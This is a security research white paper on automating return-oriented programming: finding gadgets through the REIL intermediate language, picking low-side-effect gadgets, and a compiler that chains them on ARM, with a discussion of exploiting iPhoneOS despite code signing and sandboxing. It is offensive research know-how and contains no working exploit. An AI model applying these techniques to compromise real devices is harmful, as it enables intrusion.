Everybody be cool, this is a ROPpery - White paper

Everybody be cool, this is a roppery!

Vincenzo Iozzo, zynamics GmbH <vincenzo.iozzo@zynamics.com>
Tim Kornau, zynamics GmbH <tim.kornau@zynamics.com>
Ralf-Philipp Weinmann, University of Luxembourg <ralf-philipp.weinmann@uni.lu>

Abstract

We present algorithms which allow an attacker to search for and compose gadgets regardless of the underlying architecture using the REIL meta-language. Gadgets are code fragments which can be used to build unintended programs from existing code in memory. Our contribution is a framework of algorithms capable of locating a Turing-complete gadget set, together with a return-oriented compiler for the ARM architecture as a proof-of-concept implementation. This compiler accepts input in an assembly-like language, replacing the otherwise tedious process of selecting gadgets by hand. It therefore enables the researcher to focus on the other parts of successful exploitation by minimizing shellcode development time. Furthermore, we discuss the steps necessary for successful exploitation of iPhoneOS using the developed framework and the compiler.

1 Introduction

Return-oriented programming [10, 14, 1, 6, 2, 9, 13, 12, 3] is an offensive technique to achieve execution of code with arbitrary, attacker-defined behaviour without code injection. Enforcing least-privilege permissions on memory pages as done by PaX [16], the original predecessor of what is called Data Execution Prevention (DEP) or NX on other operating systems, and even more so in combination with mandatory, kernel-enforced integrity checks on code pages such as those used by iPhoneOS (a security measure called “code signing”), has made this and similar techniques a necessity for the exploitation of memory corruptions. By chaining sequences of instructions in the executable memory of the attacked process, an attacker can leverage a memory corruption vulnerability into a practical exploit even in the presence of these protection mechanisms. Return-oriented programming is not a technique to bypass address randomization protection mechanisms like ASLR [15].

1.1 The REIL meta-language

The Reverse Engineering Intermediate Language (REIL) [5] is a platform-independent intermediate language which aims to simplify static code analysis algorithms such as the gadget finding algorithm for return-oriented programming presented in this paper. It abstracts away the specifics of individual assembly languages to facilitate cross-platform analysis of disassembled binary code.

REIL performs a simple one-to-many mapping of native CPU instructions to sequences of simple atomic instructions. Memory access is explicit. Every instruction has exactly one effect on the program state. This contrasts sharply with native assembly instruction sets, where the exact behaviour of instructions is often influenced by CPU flags or other pre-conditions.

All instructions use a three-operand format. For instructions where some of the three operands are not used, place-holder operands of a special type called ε are used where necessary. Each of the 17 different REIL instructions has exactly one mnemonic that specifies the effect of the instruction on the program state.

1.1.1 The REIL VM

To define the runtime semantics of the REIL language it is necessary to define a virtual machine (REIL VM) that specifies how REIL instructions behave when interacting with memory or registers.

The names of REIL registers follow the convention t-number, like t0, t1, t2. The actual size of these registers is specified upon use and not defined a priori (in practice only register sizes between 1 byte and 16 bytes have been used). Registers of the original CPU can be used interchangeably with REIL registers.
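
The three-operand format and the t-register convention of REIL can be illustrated with a small sketch. This is not the REIL implementation: the class `ReilInstruction`, the function `execute`, the use of `None` for the empty operand ε and the restriction to `add`, `sub` and `str` are assumptions made for illustration only.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# An operand is an integer literal, a register name, or None (standing in for ε).
Operand = Optional[Union[int, str]]


@dataclass(frozen=True)
class ReilInstruction:
    """Hypothetical container for one three-operand REIL instruction."""
    mnemonic: str
    op1: Operand
    op2: Operand
    op3: Operand


def execute(program: List[ReilInstruction], registers: Dict[str, int]) -> Dict[str, int]:
    """Run a straight-line program; each instruction has exactly one effect."""
    regs = dict(registers)

    def value(op: Operand) -> int:
        # Integer literals evaluate to themselves, register names are looked up.
        return op if isinstance(op, int) else regs[op]

    for ins in program:
        if ins.mnemonic == "add":
            regs[ins.op3] = value(ins.op1) + value(ins.op2)
        elif ins.mnemonic == "sub":
            regs[ins.op3] = value(ins.op1) - value(ins.op2)
        elif ins.mnemonic == "str":
            regs[ins.op3] = value(ins.op1)
        else:
            raise NotImplementedError(ins.mnemonic)
    return regs


# Native registers (R0, R1) and REIL registers (t0, t1) are used side by side.
program = [
    ReilInstruction("str", "R1", None, "t0"),
    ReilInstruction("add", "t0", 4, "t1"),
    ReilInstruction("str", "t1", None, "R0"),
]
result = execute(program, {"R1": 10})
```

Register sizes, memory and the remaining mnemonics are deliberately left out of this sketch.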

The REIL VM uses a flat memory model without alignment constraints. The endianness of REIL memory accesses equals the endianness of memory accesses of the source platform.

1.1.2 REIL instructions

REIL instructions can loosely be grouped into five different categories according to the type of the instruction (see Figure 1).

ARITHMETIC INSTRUCTIONS      OPERATION
ADD x1, x2, y                y = x1 + x2
SUB x1, x2, y                y = x1 − x2
MUL x1, x2, y                y = ⌊x1 · x2⌋
DIV x1, x2, y                y = ⌊x1 / x2⌋
MOD x1, x2, y                y = x1 mod x2
BSH x1, x2, y                y = ⌊x1 · 2^x2⌋ if x2 ≥ 0
                             y = ⌊x1 / 2^(−x2)⌋ if x2 < 0
BITWISE INSTRUCTIONS         OPERATION
AND x1, x2, y                y = x1 & x2
OR x1, x2, y                 y = x1 | x2
XOR x1, x2, y                y = x1 ⊕ x2
LOGICAL INSTRUCTIONS         OPERATION
BISZ x1, ε, y                y = 1 if x1 = 0
                             y = 0 if x1 ≠ 0
JCC x1, ε, y                 transfer control flow to y iff x1 ≠ 0
DATA TRANSFER INSTRUCTIONS   OPERATION
LDM x1, ε, y                 y = mem[x1]
STM x1, ε, y                 mem[y] = x1
STR x1, ε, y                 y = x1
OTHER INSTRUCTIONS           OPERATION
NOP ε, ε, ε                  no operation
UNDEF ε, ε, y                undefined instruction
UNKN ε, ε, ε                 unknown instruction

Figure 1: List of REIL instructions

Arithmetic and bitwise instructions take two input operands and one output operand. Input operands are either integer literals or registers; the output operand is a register. None of the operands have any size restrictions. However, arithmetic and bitwise operations can impose a minimum or a maximum output operand size relative to the sizes of the input operands.

Note that certain native instructions such as FPU instructions and multimedia instruction set extensions cannot be translated to REIL code yet. Another limitation is that some instructions which are close to the underlying hardware, such as privileged instructions, cannot be translated to REIL; similarly, exceptions are not handled. All of these cases require an explicit and accurate modelling of the respective hardware features.

1.2 iPhone peculiarities

Since the first release of iPhoneOS (which has been renamed to iOS) a number of countermeasures were introduced in order to reduce the possible attack surface and the reliability of exploits. The two most significant techniques to prevent attacks on iPhoneOS are code signing and application sandboxing. ASLR, on the other hand, has not yet appeared on this platform. Code signing is a security measure aimed at allowing only signed code to be executed on the phone. This is achieved by introducing an extra segment in the binary which contains a signature that is used at runtime by the kernel to verify the authenticity of the binary and, more importantly, to decide which pages in the process address space are to be marked as executable. Code signing mainly enforces two rules:

1. Pages marked with WRITE permissions can’t have EXECUTABLE permissions
2. It is not possible to allocate executable pages on the heap

Unlike on many desktop operating systems, it is not possible to disable code signing on iPhoneOS from unprivileged processes in user-space. In fact the policy is enforced in the kernel using mandatory access control (MAC) policies. The implementation of this security measure is contained in the AMFI (Apple Mobile File Integrity) kernel extension and is thus not modifiable from user space by non-root processes.

The second notable security countermeasure used on iPhoneOS is application sandboxing. This works by enforcing a MAC policy on access to files and network resources; the policy is implemented in the sandbox kernel extension (formerly called seatbelt). The enforced sandbox profile varies significantly depending on the process. Some processes running as root have no sandbox policy enforced at all, which makes them a perfect target if the attacker is able to create a two-stage attack. Standard applications with network interaction like the browser and the email client have a tightened policy enforced. Applications from the AppStore are the ones with the strictest sandbox profile, which makes them an undesirable target for an attacker.

In order for an exploit to be effective an attacker must overcome the limitations imposed by code signing and application sandboxing. To date the only available technique to defeat code signing is the use of return-oriented programming payloads. Nonetheless the level of access to the system still depends on the sandbox policy of the targeted process.

Another important consideration regarding the design of exploits on iPhoneOS is the complexity of reliably testing the payload. On non-jailbroken iPhoneOS devices it is not possible to debug third-party applications; therefore the only information available on the target process is the crash logs collected by iTunes.

A simple, yet effective, technique to test the correctness of return-oriented programming payloads is to create test programs linked against the frameworks used by the target process. These can then be debugged using the XCode iPhone debugger. Note that, as mentioned before, the sandbox profile of test applications is stricter than those of certain likely targets, and it is not possible to change the profile to closely resemble that of the target. Therefore only the programmatic correctness of the return-oriented programming gadgets can be checked with this technique, and not the effectiveness of the payload itself against the original target.

1.3 Problem approach

Our goal is to build a program which consists of existing code chunks from other programs. We call a program that is built from the parts of another program a return-oriented program (independent of whether an actual return instruction is part of the program or not). To build a return-oriented program, atomic parts that form the instructions in this program have to be identified first. Parts of the original code that can be combined to form a return-oriented program are called “gadgets”.

In order to be combinable, gadgets must end in an instruction that allows the attacker to dictate which gadget is executed next. This means that gadgets must end in instructions that set the program counter to a value that is obtained from either memory or a register. We call such instructions “free branch” instructions.

A “free branch” instruction must satisfy the following properties:

• The instruction has to change the control flow (e.g. set the program counter)
• The target of the control flow must be computed from a register or memory location.

In order to achieve Turing-completeness, only a small number of gadgets are required. Furthermore, most gadgets in a given address space are difficult to use due to complexity and side effects. The presented algorithms identify a subset of gadgets in the larger set of all gadgets that is both sufficient for Turing-completeness and convenient to program in.

We build the set of all gadgets by identifying all “free branch” instructions and performing bounded code analysis on all paths leading to these instructions. In order to search for useful gadgets in the set of all gadgets, we represent the gadgets in tree form. On this tree form, we perform several normalizations. Finally, we search for pre-determined instruction “templates” within these trees to identify the subset of gadgets that we are interested in.

The templates are specified manually. For every operation only one gadget is needed. For a set of gadgets which perform the same operation only the simplest gadget is selected.

Structure of paper The paper is organized as follows: Section 2 gives a description of the algorithm used for finding gadgets. Section 3 looks at suitable gadget sets and elaborates on the complexity of gadgets and their side effects. Section 4 describes the design and implementation of a compiler which can automatically chain a set of located gadgets to produce valid return-oriented programming shellcode from a custom low-level language. Section 5 concludes.

2 Algorithms for finding Gadgets

2.1 Stage I

Locating Free Branch Instructions In order to identify all gadgets, we first identify all free branch instructions in the targeted binary. This is currently done by explicitly listing them.

Goal for Stage I The goal of the data collection phase is to provide us with:

• possible paths that are usable for gadgets and end in a free-branch instruction
• a REIL representation of the instructions on the possible paths.

Path Finding From each free branch instruction, we collect all regular control-flow paths of a pre-configured maximum length within the function that the branch is located in.

We only take paths into account which are shorter than a user-defined threshold. A threshold is necessary because otherwise it becomes infeasible to analyse all effects of the encountered instructions.

A path has no minimum length, and we store a path each time we encounter a new instruction. Along with the information about the traversed instructions we also store the traversed basic blocks to differentiate paths properly. The path search is therefore an application of depth-limited search (DLS) [17].

Instruction Representation We now have all possible paths which are terminated by our selected free-branch instructions and are shorter than the defined threshold. To construct the gadgets we must determine what kind of operation the instructions on the possible paths perform.

We represent the operation that the code path performs in the form of a binary expression tree. We can construct this binary expression tree from the path in a platform-independent manner by using the REIL representation of the code on this path.

An expression tree (Figure 2) is a simple structure which is used to represent complex functions as a binary tree. In an expression tree, leaf nodes are always operands and non-leaf nodes are always operators.

[Figure 2: expression tree with root STM, operator nodes + and ⊗, and leaf operands R2, R3, R4 and 123]

Figure 2: Expression tree example

Using a binary tree structure we can compare trees and sub-trees. Multiple instructions can be combined because operands are always leaf nodes: an already existing tree for an instruction can be updated with new information about its source operands by simply replacing a leaf node with the tree associated with that source operand.

When the algorithm is finished we have a REIL expression tree representation for each instruction which we have encountered on any possible path leading to the free-branch instruction. As some instructions alter more than one register and one tree represents the effects on only one register, a single instruction might have more than one tree associated with it.

Special Cases The algorithm we have presented works for almost all cases but still needs to handle some special cases, which include memory writes to dynamic register values and system state dependent execution of instructions.

Memory reads need no special treatment, even if multiple memory addresses are read. This is because the address of a memory read is either a constant or a register. Both have a defined state at the time the instruction is executed and can therefore safely be used as source.

Memory writes are different because they can use a register or a register plus offset as target for storing memory (Line 1 Figure 3). This register holding the memory address can be reused by later instructions (Line 2 Figure 3). Therefore, it cannot safely be used as target because information about it could get lost.

0x00000001 stm 12345678, ,R0
0x00000002 add 1, 2, R0

Figure 3: Reusing registers example

We deal with this problem by assigning a new unique value as key to the tree every time a memory store takes place. Therefore, we do not lose the information that the memory write took place. We also still need the information about where memory gets written. We keep it by storing the REIL expression tree representation of the target in our expression tree. This prevents subsequent instructions from overwriting the contents of the register. Even though there are other ways to achieve the same uniqueness for memory writes (like SSA [4]), the implemented behaviour solves the problem without the additional overhead of other solutions.

Some architectures include instructions which depend on the current system state. System state in this case is, for example, a flag condition on platforms where flags exist. For these instructions we need to make sure that the instruction's expression tree can hold the information about the operation for all possible cases.

What we are looking for is a way to have only a single expression tree for a conditional instruction. To fulfil this requirement we must have all possible outcomes of the instruction in our expression tree. This is possible by using the properties of multiplication to allow only one of the possible outcomes to be valid at any time and combining all possible outcomes by addition.

result = path_true * condition + path_false * !condition

Figure 4: Cancelling mechanism

This works because flag conditions are always one or zero; therefore each product is either zero or the result of the instruction's operation for the specific flag setting. Using this cancelling mechanism (Figure 4) we avoid storing multiple trees for conditional instructions.
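
The cancelling mechanism of Figure 4 can be tried out on a small tuple-based expression tree. The tree encoding, the helper names `cancel` and `evaluate`, and the example of a conditional move guarded by a flag `Z` are assumptions made for illustration; negation of the condition is expressed with `bisz`, which yields 1 for a zero input and 0 otherwise.

```python
from typing import Dict, Tuple, Union

# A tree is an integer literal, a register or flag name, or (operator, child, ...).
Tree = Union[int, str, Tuple]


def cancel(condition: Tree, path_true: Tree, path_false: Tree) -> Tree:
    """Build path_true * condition + path_false * !condition as one tree."""
    return ("+",
            ("*", path_true, condition),
            ("*", path_false, ("bisz", condition)))


def evaluate(tree: Tree, env: Dict[str, int]) -> int:
    """Evaluate a tree for concrete register and flag values."""
    if isinstance(tree, int):
        return tree
    if isinstance(tree, str):
        return env[tree]
    op, *children = tree
    values = [evaluate(child, env) for child in children]
    if op == "+":
        return values[0] + values[1]
    if op == "*":
        return values[0] * values[1]
    if op == "bisz":
        return 1 if values[0] == 0 else 0
    raise ValueError(op)


# Hypothetical conditional move: R0 becomes R1 if flag Z is set, else stays R0.
tree = cancel("Z", "R1", "R0")
taken = evaluate(tree, {"Z": 1, "R0": 5, "R1": 9})      # 9
not_taken = evaluate(tree, {"Z": 0, "R0": 5, "R1": 9})  # 5
```

Because the flag is either one or zero, exactly one of the two products survives, so a single tree covers both outcomes.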

2.2 Stage II

Goal for Stage II Our overall goal is to be able to automatically search for gadgets. The information which we have extracted in the first stage does not yet enable an algorithm to perform this search. This is due to the missing connection between the extracted paths and the effects of the instructions on the path. In this stage of our algorithms we merge the information extracted in stage I and enable stage III to locate gadgets. The merge process combines the effects of single native instructions along all possible paths.

Merging Paths and Expression Trees On assembly level almost any function can be described as a graph of connected basic blocks which hold instructions. We extracted the effects of these native instructions into expression trees in stage I using REIL as representation. We also extracted path information about all possible paths through the graph in reverse execution order using depth-limited search in stage I. Each path is one possible control flow through the available disassembly of a function, ending in a “free branch” instruction and limited by the defined threshold.

Instruction sequences, however, are executed in execution order, following the control flow of the current function. This control flow through a function is determined by the branches which connect the basic blocks.

As we have extracted path information in reverse execution order, we potentially have conditional branches in our execution path. Therefore, to be able to use the path we need to determine the condition which needs to be met for the path to be executable.

Given that all potential conditions can be extracted, we need to take the encountered instructions on the path and merge their respective effects on registers and memory, such that we can make a sound statement about the effects of the executed instruction sequence.

Once path information and instruction effects are merged into a single expression tree, this tree potentially contains redundant information. This redundant information is the result of the REIL translation and the merging process. We do not need it and therefore remove it before starting with stage III.

General Strategy We have now specified all aspects which need to be solved by the second stage algorithms. The first two aspects are handled by analysing one single path. For each encountered instruction on the path the conditional branch detection and the merging process are performed. After we have reached the free branch instruction and have a sound statement about all effects, the redundant information is removed.

Determining Jump Conditions To determine whether we have encountered a conditional branch and need to extract its condition, we use a series of steps which allow us to include the information about the condition to be met in the final result of the merging process.

For each instruction which is encountered while we traverse the path in execution order, the expression trees for this instruction are searched for a conditional branch. If we find a conditional branch in the expression trees, we determine whether the next address in the path is equal to the branch target address. If it is, we generate the condition “branch taken”; if not, the condition “branch not taken” is generated. As we want to know which exact condition must be true or false, we save the expression tree along with the condition. If we do not find a conditional branch no further action is taken.

Merging Instruction Sequence Effects As we want to make a sound statement about all effects which a sequence of instructions has on registers and memory, we need to merge the effects of single instructions on one path.

To perform the merge we start with the first instruction on an extracted path. We save the expression trees for the first instruction, which represent its effects on registers or memory. This saved state is called the current effect state. Then, following the execution path, we iterate through the instructions. For each instruction we analyse the leaf nodes of its expression trees and locate all native register references. If a native register is a leaf node in an expression tree, we check whether we already have a saved expression tree for this register from the previous instructions. If we have, the register leaf node is substituted with the already saved expression tree. Once all expression trees of the current instruction have been analysed, they are saved as the new current effect state by storing them in the old effect state. New register or memory write expression trees are simply stored along with the already stored expression trees. But if we have a write to a register for which an expression tree has already been stored, the stored tree is overwritten. When the free branch instruction has been reached and its expression trees have been merged, the effect of all instructions on the current path is saved along with the path starting point. The results of the stage II algorithms are summarized in the list below.
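
The merge of instruction effects along one path can be sketched as follows. The sketch is a simplification under stated assumptions: trees are nested tuples of the form `(operator, child, child)`, every instruction is given as a hypothetical dictionary from the written register to its expression tree, and memory writes and branch conditions are left out.

```python
from typing import Dict, List, Tuple, Union

# A tree is an integer literal, a register name, or (operator, child, child).
Tree = Union[int, str, Tuple]


def substitute(tree: Tree, state: Dict[str, Tree]) -> Tree:
    """Replace register leaves by the trees already saved for them."""
    if isinstance(tree, str):
        return state.get(tree, tree)
    if isinstance(tree, tuple):
        return (tree[0],) + tuple(substitute(child, state) for child in tree[1:])
    return tree  # integer literal


def merge_path(effects: List[Dict[str, Tree]]) -> Dict[str, Tree]:
    """Merge per-instruction effects, given in execution order, into the
    effect state of the whole path."""
    state: Dict[str, Tree] = {}
    for instruction_effects in effects:
        # Analyse all trees of the instruction against the old state first,
        # then store them; an existing tree for a register is overwritten.
        updated = {reg: substitute(tree, state)
                   for reg, tree in instruction_effects.items()}
        state.update(updated)
    return state


# Hypothetical path: R0 = R1 + 4; R2 = R0 * R0; R0 = R0 + 1
path_effects = [
    {"R0": ("+", "R1", 4)},
    {"R2": ("*", "R0", "R0")},
    {"R0": ("+", "R0", 1)},
]
final_state = merge_path(path_effects)
```

Every leaf of the merged trees refers to a register value from before the path executed, which is the second of the stage II properties listed next.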

• All effects on all written native registers are present in expression tree form
• Native registers which are present as leaf nodes are in their original state prior to execution of the instruction sequence
• All effects on written memory locations are present in expression tree form
• All conditions which need to be met for path execution are present in expression tree form
• Only effects which influence native registers are present in the saved expression trees

Simplifying Expression Trees As we now have all effects which influence registers and memory, and all conditions which need to be met, stored in expression trees, the last step is to remove the redundant information from the saved expression trees. Partly this redundancy is due to the fact that REIL registers, in contrast to native registers, do not have a size limitation. To simulate the size limitation of native registers, REIL instructions mask the values written to registers to the original size of the native register. These mask instructions and their operands are redundant and can be removed. Redundancy is also introduced by the REIL translation of instructions where the effect on a register or memory location can only be represented correctly through a series of simple mathematical operations which can be reduced to a more compact representation.

SIMPLIFICATION OPERATION   DESCRIPTION
remove truncation          remove truncation operands
remove neutral elements    ∀ op ∈ {+, …, ⊗, |}: λ op 0 ⇒ λ
                           ∀ op ∈ {×, &}: λ op 0 ⇒ 0
                           ∀ op ∈ {⊕, |, +}: 0 op λ ⇒ λ
                           ∀ op ∈ {&, ×, …, ÷}: 0 op λ ⇒ 0
merge bisz                 eliminate two consecutive bisz instructions
merge add, sub             merge consecutive adds, subs and their operands
calculate arithmetic       given both arguments for an arithmetic mnemonic are integers,
                           calculate the result and store the result instead of the
                           original mnemonic and operands

Figure 5: List of simplifications

The simplification is performed by applying the list of simplifications (Figure 5) to each expression tree present in the current effect state of a completely merged path. In the simplification method the tree is tested for the applicability of the current simplification. If the simplification is applicable, it is performed and the tree is marked as changed. The process loops as long as one of the simplification methods can still simplify the tree, as indicated by the changed mark. After the simplification algorithm terminates, all expressions have been simplified according to the simplification rules. We call this state the final effect state. This state is then saved along with the starting address of the path.

2.3 Stage III

Goal for stage III In the last two stages the effects of a series of instructions along a path have been gathered and stored. This information is the basis for the actual gadget search, which is the third stage. Our goal is to locate specific functionality within the set of all possible gadgets that were collected in the first two stages. A set of multiple algorithms is used to pinpoint each specific functionality.

We start by describing the core function for gadget search. We then focus on the actual locator functions. Finally we present a complexity estimation algorithm which helps us decide which gadget to use for one specific gadget type.

Gadget Search Core Function Our overall goal is to locate gadgets which perform a specific operation. All of our potential gadgets are organized as a set of expression trees describing the effects of the instruction sequence. Therefore we need an algorithm which compares the expression trees of the gadget to expression trees which reflect a specific operation.

To locate specific gadgets in the set of all gadgets we use a central function which consecutively calls all gadget locator functions for a single potential gadget. This function then parses the result of the locator functions to check whether all the conditions for a specific gadget type have been met. If all conditions for one gadget type have been met, the potential gadget is included in the list of this specific gadget type. A potential gadget can be included in more than one specific gadget list if it fulfils the conditions of more than one gadget type.

Specific Gadget Locator Functions To locate a specific gadget type our core gadget algorithm uses specific matching functions for each desired type of gadget. These locator functions have the desired behaviour encoded into an expression tree.

The locator function parses all register, memory location, condition and flag expression trees present in the current potential gadget. For each of the expression trees it checks whether it meets the initial condition present in the locator. If one of the expression trees meets the initial condition, we compare the complete matching expression tree to the expression tree which has met the condition. If the expression tree matches, the information about the matched gadget is passed back to our core algorithm for inclusion into the list of this gadget
type. If no match is found nothing is returned to the core algorithm.

Our defined gadget locators do not make perfect matches, which means that they are not strictly coupled to one specific instruction sequence. Rather, they try to reason about the effect a series of instructions has. This behaviour is desired because with a rather loose matching we are able to locate more gadgets which provide us with equal operations. One example of such a loose match is that our gadget locators accept a memory write that is addressed not only by a register but also by a combination of registers and integer offsets.

Gadget Complexity Calculation In the last algorithm we have collected all the gadgets which perform the desired operations we have predefined. The number of gadgets in a binary is about ten to twenty times higher than the number of functions. But not all the gadgets are usable in a practical manner because they exhibit unintended side effects (see Section 3.1). These side effects must be minimized in such a way that we can easily use the gadgets. For this reason we developed different metrics which analyse all gadgets to select only the subset of gadgets which have minimal side effects.

For each gadget the complexity calculation performs two very basic analysis steps. In the first step we determine how many registers and memory locations are influenced by the gadget. This is easy because it is equivalent to the number of expression trees which are stored in the gadget. In the second step we count the number of nodes of all expression trees present in the gadget. While the first step gives us a good idea about the gadget's complexity, the second step remedies the problem of very complex expressions for certain register or memory locations, which might lead to complications if we want to combine two gadgets.

3 Properties of Gadgets

3.1 Turing-completeness

Minimal Turing-complete Gadget Set As we want to be able to perform arbitrary computation with our gadgets we need the gadget set to be Turing-complete. The simplest possible instruction set which is proven to be Turing-complete is that of a one instruction set computer (OISC) [11]. The instruction used performs the following operations:

Subtract A from B, giving C; if C < 0, jump to D

Given that this exact instruction is not present in most if not all architectures, we need a more sophisticated gadget set which allows us to perform arbitrary operations. If we split the OISC instruction into its atomic parts we obtain three instructions:

• Subtract
• Compare less than zero
• Jump conditional

These three instructions are common to all architectures and can therefore be treated as one of the possible minimal gadget sets we can search for.

Practical Turing-complete Gadget Set Given the minimal Turing-complete gadget set we can theoretically perform all computations possible on any other machine which is Turing-complete. But we are far from a real-world practical gadget set to perform realistic attacks. This is because our gadget set needs to meet a set of constraints to be practical:

• We assume very limited memory
• We want to be able to perform most arithmetic directly
• We want to be able to read/write memory
• We want fine-grained control over the control flow
• We need to be able to access I/O

Therefore, our practical gadget set contains significantly more gadgets than needed for it to be Turing-complete. We divide the gadgets we try to locate into categories:

• Arithmetic and logical (add, sub, mul, div, and, or, xor, not, rsh, lsh)
• Data movement (load/store from memory, move between registers)
• Control (conditional/unconditional branch, function call, leaf function call)
• System control (access I/O)

Gadget chaining Given the gadgets defined in the above categories, we need a way to combine them to form our desired program. We are searching for gadgets starting with free-branch instructions. A free-branch instruction is defined to alter the control flow depending on our input. As all gadgets which we locate in the given binary end in a free-branch instruction, they can all be combined to form the desired program.
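
The one-instruction computer named in this section, and its split into subtract, compare less than zero and conditional jump, can be sketched as a small interpreter. The memory layout, the tuple encoding `(A, B, C, D)` of memory cell indices and jump target, the halting rule (leaving the program) and the `max_steps` guard are assumptions made for illustration.

```python
from typing import List, Tuple

Instruction = Tuple[int, int, int, int]  # (A, B, C, D)


def run_oisc(program: List[Instruction], memory: List[int],
             max_steps: int = 1000) -> List[int]:
    """Execute 'subtract A from B, giving C; if C < 0, jump to D'."""
    mem = list(memory)
    pc = 0
    steps = 0
    while 0 <= pc < len(program) and steps < max_steps:
        a, b, c, d = program[pc]
        difference = mem[b] - mem[a]        # atomic part 1: subtract
        mem[c] = difference
        is_negative = difference < 0        # atomic part 2: compare less than zero
        pc = d if is_negative else pc + 1   # atomic part 3: jump conditional
        steps += 1
    return mem


# Count mem[1] down from 3 until it becomes negative.
# mem[0] holds the constant 1, mem[2] the constant 0, mem[3] is scratch space.
program = [
    (0, 1, 1, 2),  # mem[1] -= 1; leave the program (halt) once it is negative
    (0, 2, 3, 0),  # mem[3] = 0 - 1 is always negative: unconditional jump to 0
]
final_memory = run_oisc(program, [1, 3, 0, 0])
```

Each of the three commented steps corresponds to one of the atomic instructions, which is why a gadget set providing them is sufficient in principle.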

Side Effects of Gadgets. All gadgets located by our algorithms potentially influence registers or memory locations which are not part of the desired gadget type operation. These effects are the side effects of a gadget. As we introduce metrics to determine the complexity of gadgets, these side effects can be reduced. But in the case of a very limited number of gadgets for a specific gadget type, side effects can be inevitable. Therefore, we need to analyse which side effects can be present. One possible side effect is that we write arbitrary information into a register. This case can be solved by marking the register as tainted such that the value in the register must first be reinitialized if it is needed in any subsequent gadget. This construction also holds for the manipulation of flags. The second possible type of side effect occurs when writing to a memory location that is addressed by a non-constant (e.g. a register). In this case we have to make sure that prior to gadget execution the address where the memory write will take place is valid in the context of the program and does not interfere with gadgets we want to execute subsequent to the current gadget. This is not always possible and therefore we try to avoid gadgets with memory side effects.

3.2 Metrics and Minimizing Side Effects

As we have pointed out, side effects are one of the major problems when using instruction sequences which were not intended to be used like this. We have worked out metrics which help us categorize all usable gadgets to minimize side effects.

• stack usage of the gadget in bytes
• usage of written registers
• memory use of the gadget
• number of nodes in the expression trees of a gadget
• use of conditions in the gadget execution path

In most attacks the size which can be used for an attack is limited. Therefore the stack usage of the attack must be small for the approach to be feasible. The usage of registers should be small to avoid overwriting potentially important information. The memory usage of the gadgets should be small to lower the potential access to inaccessible memory. The number of nodes in the expression trees provides an indicator for the complexity of the operations of the gadget. Therefore, if we have only very few nodes, the complexity is also very low. The use of conditions in the gadget can have the implication that we need to make sure that certain conditions are set in advance. This leads to more gadgets in the program and therefore to more space which we need for the attack.

Using the defined metrics minimizes complex gadgets and side effects and therefore leads to a usable gadget set.

4 Chaining gadgets with side-effects

To automatically chain gadgets into useful programs, we have written a basic compiler called “The Wolf”. As input, this compiler takes programs written in a low-level form somewhat close to the assembly language of the target CPU; namely, registers must be explicitly allocated and the only construct to implement a loop is a conditional goto instruction. For now, the only target CPU that Wolf was tested with is ARM. In case a given statement cannot be compiled, the compiler emits an error message. A description of the Wolf language in EBNF can be found in the appendix.

Access statements define which registers can be clobbered and which memory regions may be read and overwritten by the side-effects of gadgets. The protect statement is used to tell the compiler which registers may not be clobbered by side-effects; all other registers are fair game. The allowcorrupt statement specifies memory regions that may be overwritten by side-effects; similarly, allowread is used to tell the compiler which memory regions can be read without causing exceptions.

Control flow can be changed using the call gadget to call a native code function. To change the control flow within the ROP code, the gotoifnz statement can be used, which changes the control flow to a previously defined label within the code, depending on whether its first argument is non-zero or not. To do this, gadgets that modify the stack pointer are used. For the call gadget the compiler takes care to set the link register appropriately (this is architecture specific).

Assignments. The most important but also the most challenging part to implement was the multi-assignment. The purpose of this construction is to give the compiler freedom in how a requested register allocation or memory transfer is achieved by chaining gadgets contained in the gadget catalog. To compile an assignment into ROP code, a breadth-first search on the gadget catalog is performed that finds gadgets that


modify the target values on the left-hand side of the assignment. For a selection of gadgets we then need to check whether any of their side-effects are unwanted. This is implemented by using an external SMT (Satisfiability Modulo Theories) solver, in our case STP [8, 7], that checks whether the constraints defined by the access statements can be fulfilled. If we cannot find a gadget that directly performs the computation and the assignment for a given component of the tuple, we search for gadgets that can at least assign another register or memory location for the given component. We then replace the component of the LHS with that register or memory location, record the side effects of the gadget used and begin the search again. Note that assignments and multi-assignments may contain significant amounts of computation; these cases will most likely require the compiler to chain multiple gadgets per component and may take significant amounts of time to compile.

Implementation details. The Wolf is implemented as a Python package that needs to be imported. In order to resolve forward references in the code, they have to be declared explicitly using the forwardref statement. A program is compiled by simply prefacing a Python script containing the program to be compiled with from wolf.platform import * and running the Python interpreter on this script. The wolf.platform class is an architecture and platform-specific subclass of the wolf class.

5 Conclusions

We have presented algorithms to automate an architecture-independent approach for finding gadgets for return-oriented programming and related offensive techniques. By introducing the free-branch paradigm we are able to reason about gadgets in a more general form than previously proposed; this is especially helpful when using an intermediate language. Furthermore we have shown how a compiler can be built for chaining gadgets even if these gadgets have strong side-effects. Previous compilers (for ROP on x86) used very simple gadgets that were without side-effects.

With the proliferation of hardware-enforced data execution prevention on newer embedded devices we expect our tools and techniques to be of significant value for offensive security research.

References

[1] Erik Buchanan, Ryan Roemer, Hovav Shacham, and Stefan Savage. When good instructions go bad: generalizing return-oriented programming to RISC. In Peng Ning, Paul F. Syverson, and Somesh Jha, editors, ACM CCS 2008, pages 27–38. ACM, 2008.

[2] Stephen Checkoway, John A. Halderman, Ariel J. Feldman, Edward W. Felten, B. Kantor, and H. Shacham. Can DREs provide long-lasting security? The case of return-oriented programming and the AVC Advantage. Proceedings of EVT/WOTE 2009, 2009.

[3] Stephen Checkoway and Hovav Shacham. Escape from return-oriented programming: Return-oriented programming without returns (on the x86), 2010. In Submission.

[4] Ron Cytron, Jeanne Ferrante, Barry K. Rosen, Mark N. Wegman, and F. Kenneth Zadeck. Efficiently computing static single assignment form and the control dependence graph. ACM Transactions on Programming Languages and Systems, 13(4):451–490, 1991.

[5] Thomas Dullien and Sebastian Porst. REIL: A platform-independent intermediate representation of disassembled code for static code analysis. http://www.zynamics.com/downloads/csw09.pdf, March 2009.

[6] Aurélien Francillon and Claude Castelluccia. Code injection attacks on harvard-architecture devices. In CCS '08: Proceedings of the 15th ACM conference on Computer and communications security, pages 15–26, New York, NY, USA, 2008. ACM.

[7] Vijay Ganesh. STP constraint solver. http://sites.google.com/site/stpfastprover/.

[8] Vijay Ganesh and David L. Dill. A decision procedure for bit-vectors and arrays. In Werner Damm and Holger Hermanns, editors, CAV 2007, volume 4590 of Lecture Notes in Computer Science, pages 519–531. Springer, 2007.

